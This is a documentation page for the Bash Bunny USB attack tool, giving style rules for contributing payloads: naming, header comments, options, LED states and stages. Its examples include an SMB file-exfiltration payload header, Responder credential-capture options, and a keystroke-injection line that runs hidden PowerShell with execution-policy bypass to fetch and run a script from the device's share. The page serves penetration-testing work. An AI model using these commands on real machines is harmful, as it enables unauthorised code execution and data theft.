Bash Bunny
Search…
Bash Bunny by Hak5
Getting Started
Switch Positions
Mass Storage Structure
LED Status Indications
Installing Additional Tools
Installing Additional Languages
Considerations for Mark II
Beginner Guides
Writing Keystroke Injection Payloads for the Bash Bunny
Network Hijacking Attacks with the Bash Bunny
Top 5 Bash Bunny Exfiltration Payloads to "steal files"
Getting Root on a Bash Bunny from the Serial Console
Remote Triggers for the Bash Bunny Mark II
Geofencing for the Bash Bunny Mark II
Internet Connectivity
Getting the Bash Bunny Online
Sharing an Internet connection from Windows
Sharing an Internet connection from Linux
Sharing an Internet connection from MacOS
Software Updates
Updating the Bash Bunny Firmware
Writing Payloads
Payload Development Basics
DuckyScript™ on the Bash Bunny
Extensions
ATTACKMODE
LED
QUACK
VID, PID, MAN, PROD, SN
Working with the File System
CPU Control
Contributing Best Practices
Submitting Payloads
WAIT_FOR_PRESENT
Troubleshooting
Factory Reset
Password Reset
Video Guides
Bash Bunny Primer
Bash Bunny Phishing Attack with Hamsters
Password Grabber Bash Bunny Payload
Operating System Detection with the Bash Bunny
Bash Bunny Extensions
Reverse Shells on Linux with Bash Bunny
Bash Bunny Payload - Sudo Bashdoor on Linux
Bash Bunny Payload - 1990's Prank
Bash Bunny Dev - Behind the Scenes
Concealed Exfiltration - Pocket Network Attacks with the Bash Bunny
How to write Bash Bunny payloads and contribute on GitHub
Powered By GitBook
Contributing Best Practices
Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available.
Please adhere to the following best practices and style guide when submitting a payload.

Naming Conventions

Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with - or _ used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category.

Binaries

Binaries may not be accepted in this repository. If a binary is used in conjunction with the payload, please document where it or its source may be obtained.

Comments

Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful.
1
Title: SMB Exfiltrator
2
Description: Exfiltrates files from %userprofile%\documents via SMB
3
Author: Hak5Darren
4
Target: Windows XP SP3 - Latest
5
Dependencies: impacket
Copied!

Configuration Options

Configurable options should be specified in variables at the top of the payload.txt file
1
# Options
2
RESPONDER_OPTIONS="-w -r -d -P"
3
LOOTDIR=/root/udisk/loot/quickcreds
Copied!

LED

The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or ATTACKMODE.
1
# Initialization
2
LED SETUP
3
GET SWITCH_POSITION
4
GET HOST_IP
5
6
# Attack
7
LED ATTACK
8
ATTACKMODE HID ECM_ETHERNET
Copied!

Stages and States

Stages should be documented with comments
1
# Keystroke Injection Stage
2
# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
3
GET HOST_IP
4
LED STAGE1
5
ATTACKMODE HID
6
RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection $HOST_IP -count 1) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
Copied!
Common payload states include a SETUP, with may include a FAIL if certain conditions are not met. This is typically followed by either a single ATTACK or multiple STAGEs. More complex payloads may include a SPECIAL function to wait until certain conditions are met. Payloads commonly end with a CLEANUP phase, such as moving and deleting files or stopping services. A payload may FINISH when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to LED states.
Writing Payloads - Previous
CPU Control
Next - Writing Payloads
Submitting Payloads
Last modified 3mo ago
Copy link
Contents